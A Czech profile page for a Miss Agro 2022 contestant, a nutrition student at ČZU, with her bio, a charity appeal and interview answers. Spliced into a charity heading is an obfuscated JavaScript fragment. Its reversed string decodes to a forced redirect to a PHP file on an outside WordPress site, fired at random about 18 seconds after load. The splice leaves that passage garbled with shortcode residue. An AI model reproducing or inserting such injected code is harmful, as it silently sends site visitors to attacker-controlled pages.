Lucie Dvořáková

Profil

Fotografie

Fakulta: FAPPZ
Obor: Výživa a potraviny
Ročník: 4.
Věk:
23

Lucka je ta o minutu starší z dvojčat… modrooká holka z Prahy, kterou láká žít život naplno a pro ostatní, každopádně až po 9. hodině ranní, protože také velmi ráda spí. Je dosti spontánní, do všeho jde na 120 % a je skvělým parťákem do nepohody. Když zrovna není ve škole nebo v práci, nejspíš kuchtí něco v kuchyni, potí duši ve fitku nebo v bazéně (ano i tam se dá potit), nebo se stará o svoji zahrádku.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2022?

Myslím, že pouze život, který žijeme pro ostatní stojí opravdu za to! Bylo by krásný, kdyby vyhrál někdo, kdo by dokázal fakulty mezi sebou ještě více stmelit. A protože mám kamarády na různých fakultách, určitě by z výhry neměla radost jen FAPPZ, ale i ostatní součásti ČZU… čím více lidem by to vykouzlilo úsměv na rtech, tím větší by to byla odměna i pro mě.

Kdybys v soutěži vyhrála dovolenou snů, jak bys chtěla, aby vypadala?

Byla by plná dobrodružství, poznávání nových kultur, dobrého jídla apod. A nikdy by samozřejmě neskončila (haha)! Mohla by to být třeba cesta kolem světa, na kterou bych ale nevyrazila sama. Určitě bych vzala ty, na kterých mi záleží (oni moc dobře vědí), a bez kterých by to určitě nebylo ono!

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Navazující studium na ČZU jsem si zvolila hlavně díky přátelskému a rodinnému prostředí, které tu pedagogové, ostatní zaměstnanci a studenti vytváří. Jejich vřelý přístup mi celé studium dost ulehčuje, protože vejška je někdy dost o nervy/na nervy (snad to tak nevnímám jen já haha). A co mám na ČZU nejraději? Možná to bude trochu klišé, ale náš kampus je prostě boží, i když je rozsáhlý a přejít ho trvá tak deset minut, což se moc nehodí když spěcháte… neměnila bych.